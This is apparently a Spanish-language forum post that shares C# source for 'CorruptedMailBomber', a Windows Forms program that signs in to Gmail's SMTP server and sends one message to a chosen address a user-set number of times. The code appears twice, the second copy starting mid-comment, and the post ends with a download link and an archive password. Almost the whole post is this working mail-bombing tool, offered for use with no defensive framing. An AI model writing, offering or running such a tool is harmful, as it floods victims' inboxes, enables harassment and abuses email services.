Simple Mail Bomber With Gmail SMTP Client

Aqui les dejo este pequeño codigo en C# de un mailbomber usando como cliente smtp Gmail
Código:
/*
Name: CorruptedMailBomber
Copyright: GNU General Public License
Author: [C]orrupted[B]yte
Date: 21/02/12
Description: Simple MailBomber with Gmail smtp client
*/
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Net.Mail;
namespace MailBomber
{
public partial class frmMain : Form
{
public frmMain()
{
InitializeComponent();
}
private void frmMain_Load(object sender, EventArgs e)
{
}
private void btnSend_Click(object sender, EventArgs e)
{
int intNum = Convert.ToInt32(txtNumber.Text);
try
{
MailMessage Mail = new MailMessage();
SmtpClient smtp = new SmtpClient("smtp.gmail.com");
Mail.From = new MailAddress(txtGmail.Text);
Mail.To.Add(txtTo.Text);
Mail.Subject = txtSubject.Text;
Mail.Body = txtBody.Text;
smtp.Port = 587;
smtp.Credentials = new System.Net.NetworkCredential(txtGmail.Text, txtPassword.Text);
smtp.EnableSsl = true;
while (intNum != 0)
{
smtp.Send(Mail);
intNum--;
}
MessageBox.Show("Mail Bomb, Successful");
}
catch (Exception ex)
{
MessageBox.Show(ex.ToString());
}
}
private void exitToolStripMenuItem_Click(object sender, EventArgs e)
{
this.Close();
}
private void aboutToolStripMenuItem_Click(object sender, EventArgs e)
{
frmAbout About = new frmAbout();
About.Show();
}
private void helpToolStripMenuItem_Click(object sender, EventArgs e)
{
frmHelp Help = new frmHelp();
Help.Show();
}
}
}
Name: CorruptedMailBomber
Copyright: GNU General Public License
Author: [C]orrupted[B]yte
Date: 21/02/12
Description: Simple MailBomber with Gmail smtp client
*/
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Net.Mail;
namespace MailBomber
{
public partial class frmMain : Form
{
public frmMain()
{
InitializeComponent();
}
private void frmMain_Load(object sender, EventArgs e)
{
}
private void btnSend_Click(object sender, EventArgs e)
{
int intNum = Convert.ToInt32(txtNumber.Text);
try
{
MailMessage Mail = new MailMessage();
SmtpClient smtp = new SmtpClient("smtp.gmail.com");
Mail.From = new MailAddress(txtGmail.Text);
Mail.To.Add(txtTo.Text);
Mail.Subject = txtSubject.Text;
Mail.Body = txtBody.Text;
smtp.Port = 587;
smtp.Credentials = new System.Net.NetworkCredential(txtGmail.Text, txtPassword.Text);
smtp.EnableSsl = true;
while (intNum != 0)
{
smtp.Send(Mail);
intNum--;
}
MessageBox.Show("Mail Bomb, Successful");
}
catch (Exception ex)
{
MessageBox.Show(ex.ToString());
}
}
private void exitToolStripMenuItem_Click(object sender, EventArgs e)
{
this.Close();
}
private void aboutToolStripMenuItem_Click(object sender, EventArgs e)
{
frmAbout About = new frmAbout();
About.Show();
}
private void helpToolStripMenuItem_Click(object sender, EventArgs e)
{
frmHelp Help = new frmHelp();
Help.Show();
}
}
}
Pueden descargar el proyecto en VS2010 a continuacion:
Descarga:
http://www.mediafire.com/?24es9pftpu84etm
Contraseña:
Backroot.org